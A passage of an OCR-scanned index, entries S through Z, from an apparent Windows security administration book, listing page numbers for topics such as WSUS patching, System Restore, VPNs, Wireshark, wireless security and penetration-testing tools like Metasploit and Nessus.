Store Update Files Locally On This Server
option, 59
strong passwords, 254
Subnet Mask setting, 320-321
success, triggering on, 463, 463
Success and Failure setting, 73
Success Audit option, 466
Success option for policy settings, 451

Successful Installation screen, 498
switches, sniffers with, 477
Symantec Endpoint Encryption, 156
Synchronization Options option, 57
Synchronize From An Upstream Windows
Server Update Services Server
option, 58
Synchronize From Microsoft Update
option, 58
Synchronize Manually option, 57
synchronizing patching, 55-62, 56-61
sysdata.xml file, 474
Syskey utility, 175-178, 177
system access control, policy development
for, 10
System Access Control List
(SACL), 456
System Configuration Utility, 75-79,
76-78
system development and maintenance,
policy development for, 10
System Failure section, 471
SYSTEM.INI tab, 76, 76
System Properties dialog box
minidumps, 469-471, 470
Run As function, 316-318, 316
System Restore, 528-529, 528
System Recovery Options dialog box,
222-223,222-223
System Restore feature, 526-528
new applications, 530, 531
process, 531-533, 531-532
restore points for, 472, 528-530,
528-530
from Safe Mode, 533, 533
System Restore tab, 528
System Restore Wizard, 528-530,
529-530
System Volume Information dialog box,

536-537,537
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TAI (Threat Analysis Index), 129
Task Manager, 47-48, 48
task scheduled scripts, 37-38, 38
Task Scheduler Wizard, 37
TCP Reset frames, 539
templates, 65-66
custom, 68-72, 68-72
default, 66-68, 67
GPOs for, 72-73,72-73
user accounts
building, 253-255, 254-255
creating users based on, 256-257, 257
Terminal Services (TS), 304-305
testing, 414
avast!, 118
EFS data recovery, 174-175
Internet vulnerability profiling, 430-
434,431, 433
Netcat, 438-441
open ports, 45-49, 47-48
penetration
Metasploit, 442-446, 443-445
with Nessus, 414-419, 416-418
with Retina, 419-424, 421-424
previous versions, 494-496, 495-496
restored data, 207-208, 208
security assessments for
IT Shavlik for, 428-430, 429-430
Microsoft Baseline Security Analyzer
for, 424-428, 426-427
Syskey mode, 177-178, 177
tracking hostile 1Ps, 434-438, 435-437
Testing Open Ports processes, 48—49
The Following System Components
Depend On This Service field, 28-29
third-party cookies, 372-373
This Service Depends On The Following
System Components field, 28

threat analysis, 5-6
Threat Analysis Index (TAI), 129
threat levels, 4
3DES, 289, 294, 335
thumb drives
BitLocker, 221, 225-227, 225-227
U3 system on, 83
time-outs for locking computers, 102-109,
104-108
Time service, 29-30, 29
Time Warp Client, 487-488
TLS (Transport Layer Security), 408-411,
410-411
Top 10 Ports page, 435, 436
TPM (Trusted Platform Module), 221
Traceroute tab, 142
tracking hostile 1Ps, 434-438, 435-437
training in user awareness programs,
12-16
Transport Layer Security (TLS), 408-411,
410-411
triggering
Audit Policy, 463-464, 463
memory dumps, 473, 473
Triple Data Encryption Standard (3DES),
289,294, 335
Tripwire program, 402
Trojaned rootkits, 119
troubleshooting, 518
host-based intrusion detection systems,
539-550, 542-550
Last Known Good Configuration for,
523-526, 525
Safe mode for, 519-523, 5§20-522
sanitizing media, 534-539, 536-538
System Restore for, 526-534,
528-533
Trusted Platform Module (TPM), 221
Trusted Sites icon, 369
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Trusted Sites window, 371, 371

TS (Terminal Services), 304-305

tunnels in IPSec VPN, 343, 344

Turn Off Automatic Updates
option, 55

Turn Off System Restore option, 528

Turn Screen Saver On Or Off option,
107, 109

Twecli32.msi file, 496

U

U3 system, 83
UAC (User Account Control), 541
PGP Desktop, 238, 238
UndeletePlus, 505, 505
UDP (User Datagram Protocol), 486
UndeletePlus tool
installing, 505-507, 505-506
remanents, 507-516, 507
United States, spam from, 385
Universal Naming Convention (UNC)
paths, 371
Universal Plug and Play (UPnP)
Framework option, 42
Update option, 131
Update Classifications option, 57
Update tab, 544, 544
updating
avast!, 115-116, 115
Microsoft Security Essentials
definitions, 544, 544
UPN (User Principal Name), 275-276
USB keys, 227-230, 227-230
USB thumb drives
BitLocker, 221, 225-227, 225-227
U3 system on, 83
Use A Proxy Server When Synchronizing
option, 58

Use Bridged Networking option, 97
Use Network Address Translation (NAT)
option, 97
Use The Following IP Address
setting, 377
User Account Control (UAC), 541
PGP Desktop, 238, 238
UndeletePlus, 505, 505
User Account Control dialog box,
238,238
User Authentication option, 382
user awareness programs, 12-16
User Cannot Change Password option,
160, 212
User Datagram Protocol (UDP), 486
User Must Change Password At First
Logon option, 256
User Must Change Password At Next
Logon option, 159-160, 212, 254,
276, 461
User Principal Name (UPN), 275-276
User tab, 405
usernames
RDP, 311
Run As function, 318
SETP, 397, 399
user accounts, 256-257
wireless access points, 326
users and user accounts
for AGDLP, 210-213, 211-213
creating, 252-259, 254-255, 257-258,
460-461
default, 271-272
decoy domain administrator
account, 275-277, 275-276
Default Domain Policy for, 273-275,
273-274
DSRM administrator passwords,
277-279



578 users and user accounts — Volume Shadow Copy (VSC)

users and user accounts (continued)
Deny group for, 279-284, 281-285
for EFS, 159-160, 160
GPOs for, 258-259, 258
Link Logger, 405
logon auditing, 264-271, 266-270
passwords, 159-160, 212
default, 271-272
new accounts, 461
policies, 259-263, 261-263
templates, 256-257
templates
building, 253-255, 254-255
creating users based on, 256-257, 257

\'

validation
downloads, 400-403, 402
IPSec VPN encryption, 350-352,
350-351
in VPN, 288
value of documents, 19-22
Verify Data After Backup option, 199
verifying personal firewall settings,
360-361, 361
versions
file. See Volume Shadow Copy (VSC)
Rootkit Hunter, 121
View Available Wireless Networks
option, 334
View Certificate option, 389
View Existing Security Scan Reports
option, 426
View Security Report screen, 426
View tab, 379-380, 380
Virtual Machine Settings dialog box,
99-100, 99-100

virtual machines (VMs), 94, 96-102,
96-101
Virtual Private Network Connection
option, 301
virtual private networks (VPNs),
288-289
clients, 300-301
configuring, 301-302, 301-302
connecting to server, 302-303, 303
IPSec VPN. See IPSec (Internet
Protocol Security) VPNs
servers, 293-295
connecting clients to, 302-303,
303
dial-in privileges for, 298-299,
298-299
RRAS services for, 295-298,
295-298
virtualization, 94-95
virtual machines, 96-102, 96-101
VMware, 94-95
viruses, 112-113
avast! antivirus tool for
downloading and installing, 114,
114-115
scanning with, 116-118, 116-118
testing, 118
updating, 115-116, 115
email, 378
threat analysis for, 5
VMs (virtual machines), 94, 96-102,
96-101
VMware, 94-95
VoIP tab, 143
Volume Shadow Copy (VSC), 487
configuring and enabling, 488-491,
489-491
previous versions for
installing, 496-500, 497-500
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producing, 491-494, 493-494
testing, 494-496, 495-496
volumes
for EFS, 158-159, 158-159
mirrored, 191-194, 191-194
VPN Server Selection screen, 301
VPNs. See virtual private networks
(VPNs)
VSC. See Volume Shadow Copy (VSC)
VShell dialog box, 397, 397
VShell SFTP server software, 397-398,
397-398
vulnerabilities
Metasploit, 442-446, 443-445
profiling, 430-434, 431, 433

)]

WAN Miniport (L2TP) option, 298

WAN Miniport (PPTP) option, 297

Warn Me Before Downloading Content
option, 381

Warning option, 465, 467

Web browsing security, 409-411,
410-411

Web traffic, encrypting, 407-409,
408-409

WGA (Windows Genuine Advantage)
program, 51

WINLINI tab, 76-77, 76

Windows Advanced Options Menu,
520521, 520, 533

Windows Defender, 74

Windows Error Reporting dialog
box, 474

Windows Firewall, 40-45, 41-44

Windows Firewall with Advanced Security
dialog box, 347, 347

Windows Genuine Advantage (WGA)
program, 51
Windows Internet Name Service (WINS), 39
Windows Scan Results option, 426
Windows Server Update Services
(WSUS)
configuring, 55-62, 56-61
patching from, 62-65, 62—-64
Windows Time service, 29-30, 29
Windows Update, 51-53
Windows Update progress dialog box,
53-54
Windows XP Startup Password dialog
box, 176, 177
WinPcap driver, 151, 480-481, 481
WINS (Windows Internet Name
Service), 39
WinSCP SFTP client, 399-400, 399
Wireless Network Connection Properties
window, 376, 376
Wireless Network Properties dialog box,
333,333
Wireless Networks tab, 332-333, 332
wireless security, 323-325
access points, 326-330, 326-330
clients, 331-335, 332-334
Wireless tab, 142
Wireless Zero Configuration
(WZCQC), 331
Wireshark Network Analyzer, 476-479
data capture, 340-341, 341-342
downloading, 337, 479, 479
installing, 337, 479-481, 480-482
IPSec VPN encryption validation,
350-352, 351
network analysis with, 484-486,
485-486
packet capturing with, 482-484,
482-484
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Workgroup mode, patching in,
54-55, 55
worms, 112
WPA-PSK option, 332
Write Debugging Information
option, 471
WSUS (Windows Server Update Services)
configuring, 55-62, 56-61
patching from, 62-65, 62-64
WZC (Wireless Zero Configuration),
331

Y

Yes, Export The Private Key option, 393

y4

Zone Settings option, 381
zones
email, 381-382, 381-382
Internet Explorer, 367-371, 370-371
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